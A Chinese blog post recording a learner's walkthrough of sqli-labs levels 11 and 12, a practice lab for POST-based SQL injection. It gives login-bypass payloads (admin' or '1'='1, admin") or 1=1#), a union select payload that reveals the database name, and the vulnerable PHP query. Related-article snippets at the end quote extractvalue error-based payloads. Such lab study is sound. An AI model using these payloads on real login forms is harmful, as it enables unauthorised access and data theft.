Sqli-labs Less11-12 基于错误的sql注入 - POST

最新推荐文章于 2024-01-03 20:00:00 发布
最新推荐文章于 2024-01-03 20:00:00 发布
阅读量601 收藏 3
点赞数 2
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81519274
版权

本文记录 SQL 注入的学习过程,资料为 SQLi

SQLi 博客目录

Less - 11: POST - Error Based - Single Quotes - String

  1. 测试漏洞

     在 username 中输入 admin'--+
 在 password 中输入任意内容

    显示错误信息

     You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'aaa' LIMIT 0,1' at line 1

    结果显示是对 ’ 的处理产生的错误

    尝试使用万能密码

     在 username 中输入 admin' or '1'='1
 在 password 中输入任意内容

    返回的正确的结果

  2. 源代码分析

     @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

 # 变成了:
 
 @$sql="SELECT username, password FROM users WHERE username='admin'or'1'='1' and password='$passwd' LIMIT 0,1";

    前面的内容因为 or 1=1 恒成立,所以语句就成立,我们此时以 admin 的用户登录。那么接下来我们尝试用 get 注入中用到的其他的语句代替 or 1=1 进行注入。

    这里我们用 union 注入进行尝试:

     username:1'union select 1,database()#
 passwd=1(任意密码)

    可以看到显示了database 为security,这是我们比较常用的手法。
    还可以利用其他的方法进行注入。上述在get 型注入中提到的语句都可以使用。

    当然了,还可以利用其他的方法进行注入,我们在后面的几个关卡中会给出示例的payload。

Less - 12: POST - Error based - Double Quotes - with twist##

  1. 测试漏洞

     在 username 中输入 admin"
 在 password 中输入任意内容

    显示错误信息

     You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ddd") LIMIT 0,1' at line 1

    我们可以得知这里的id 进行了(“id”)的处理,所以我们依旧可以用万能密码进行尝试。

     在 username 中输入 admin")#
 在 password 中输入任意内容


     在 username 中输入 admin") or 1=1#
 在 password 中输入任意内容

    用admin ")or 1=1# 方式登录的话,居然是Dumb 登录,这里解释一下为什么不是admin 登录。其实是因为sql 执行的优先级的问题。

网络安全打工人
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQL注入】Less-12基于错误的双引号POST字符型变形的注入
Mitchell_Donovan的博客
03-30 254
Less-12基于错误的双引号POST字符型变形的注入 方式一 extractvalue报错型 1、爆开数据库 payload "*"达到sql注入查询语句闭合!用--+反而不行 name=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit 2、爆开数据表 payload uname=admin" and extractvalue(1,conc
Error updating database. Cause: java.sql.SQLSyntaxErrorException: You have an error in your SQL synt
g1024173314的博客
07-04 1200
org.springframework.jdbc.BadSqlGrammarException:Error updating database. Cause: java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order'
SQL Server 报错注入(一)
zzgslh的博客
12-25 3433
SQL Server报错注入 一、原理介绍 报错注入,顾名思义首先这里是有报错信息才可以,其次我们需要人为的制造一些错误,比如使用convert()函数进行类型转换时,如果转发失败就会报错,然后把我们要执行的SQL语句与convert()函数组合起来,报错的信息当中有咱们需要的信息。 二、函数介绍 – convert()函数介绍: convert(int,db_name()),含义是将第二个参数的值转换成第一个参数的int类型。利用mssql在转换类型的时候就出错,来爆数据库信息。 – quotename(
【已解决】You have an error in your SQLsyntax;check the manual that corresponds to your SQL server vsion
Junnix的博客
06-02 2589
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near XXX at line 1
SQLi LABS Less-12 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-21 1万+
sqli第十二关,sqli-labs less-12sqlilabs less12
SQL Server注入之攻防技战法
最新发布
众生度尽,方证菩提
01-03 738
那天下着很大的雨,母亲从城里走回来的时候,浑身就是一个泥人,那一刻我就知道我没有别的选择了
SQLI-LABS Less-11 到 Less-12
Web学习之路
03-22 222
联合注入
sql注入——报错注入
m0_73756016的博客
10-18 1013
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
SQL Server手工注入方式
yy
01-04 5139
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
BurpSuite 的导入和导出
kevinhanser
07-12 8699
使用的版本为 burpsuite_pro_v2020.6.jar BurpSuite 的导入和导出 2020年7月12日10:54:51【原创】 1. 简介 主要目的是使用burp记录浏览记录,并保存成文件 2. 导出 导出整个项目成 .burp 文件 位置:Project -> Save copy 优点:跨平台分享项目中所有浏览记录 测试:二进制文件 先尽情的抓包,然后保存即可,可以只选择保存 Proxy的内容,也可以全都保存。 2. 导出单个浏览记录 位置: Proxy -> 选.
文件上传 05 服务端检测绕过(文件内容检测)
kevinhanser
08-13 6231
本文记录文件上传学习过程,教程为 《Upload Attack Framework V1.0》 文件上传检测 客户端javascript 检测(通常为检测文件扩展名) 服务端MIME 类型检测(检测Content-Type 内容) 服务端目录路径检测(检测跟path 参数相关的内容)、 服务端文件扩展名检测(检测跟文件extension 相关的内容) 服务端文件内容检测(检测内容...
文件上传 04 服务端检测绕过(文件扩展名检测)
kevinhanser
08-13 3550
本文记录文件上传学习过程,教程为 《Upload Attack Framework V1.0》 文件上传检测 客户端javascript 检测(通常为检测文件扩展名) 服务端MIME 类型检测(检测Content-Type 内容) 服务端目录路径检测(检测跟path 参数相关的内容)、 服务端文件扩展名检测(检测跟文件extension 相关的内容) 服务端文件内容检测(检测内容...
文件上传 02 服务端检测绕过(MIME类型检测)
kevinhanser
08-12 3099
本文记录文件上传学习过程,教程为 《Upload Attack Framework V1.0》 文件上传检测 客户端javascript 检测(通常为检测文件扩展名) 服务端MIME 类型检测(检测Content-Type 内容) 服务端目录路径检测(检测跟path 参数相关的内容)、 服务端文件扩展名检测(检测跟文件extension 相关的内容) 服务端文件内容检测(检测内容...
SQL 盲注方法总结
kevinhanser
08-12 3070
盲注手法 0x报错型盲注 0x01 函数讲解 函数 rand() 产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列 rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列 floor 向下取整 floor(2.5) == 2 count()统计元组的个数 concat() 字符串连接 concat('~~','...
SQL注入靶场sqli-labs
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值